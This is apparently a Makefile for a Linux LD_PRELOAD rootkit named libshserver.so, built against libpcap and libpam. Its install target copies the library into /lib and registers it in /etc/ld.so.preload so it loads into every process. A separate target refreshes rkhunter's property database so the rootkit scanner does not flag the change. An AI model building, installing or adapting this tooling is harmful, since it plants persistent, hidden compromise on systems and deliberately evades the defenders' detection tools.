CC = gcc
CFLAGS = -Wall -g
LDFLAGS = -lc -ldl -lutil -lpcap -lpam
INSTALL_DIR = /lib
LIB_TARGET = libshserver.so
LIB_SRCS = libshserver.c etc.c
LIB_OBJS = $(LIB_SRCS:.c=.o)
HASH_DB = __tmphashtable

all: config $(LIB_TARGET)

config:
	@python3 config.py > const.h

$(LIB_TARGET): $(LIB_OBJS)
	$(CC) -fPIC -shared -Wl,-soname,$(LIB_TARGET) $(LIB_OBJS) $(LDFLAGS) -o $(LIB_TARGET)

%.o: %.c
	$(CC) $(CFLAGS) -fPIC -c $< -o $@

install: all
	@echo [-] Installing rootkit
	@install -m 0755 $(LIB_TARGET) $(INSTALL_DIR)/
	@echo [-] Updating hash db
	@python3 update_hash_db.py
	@install -m 644 $(HASH_DB) /etc/
	@echo [-] Loading rootkit
	@echo $(INSTALL_DIR)/$(LIB_TARGET) > /etc/ld.so.preload
	@echo [-] Done

uninstall:
	@echo [-] Uninstalling rootkit
	@echo [-] Removing rootkit files
	rm -f /etc/ld.so.preload
	rm -f $(INSTALL_DIR)/$(LIB_TARGET)
	rm -f /etc/$(HASH_DB)
	@echo [-] Done

clean:
	rm -f $(LIB_TARGET) $(LIB_OBJS)

update-rkhunter-db:
	@echo [-] Updating rkhunter db
	@command -v rkhunter >/dev/null 2>&1 && rkhunter --propupd >/dev/null 2>&1 || true
	@echo [-] Done

.PHONY: all config install uninstall clean update-rkhunter-db

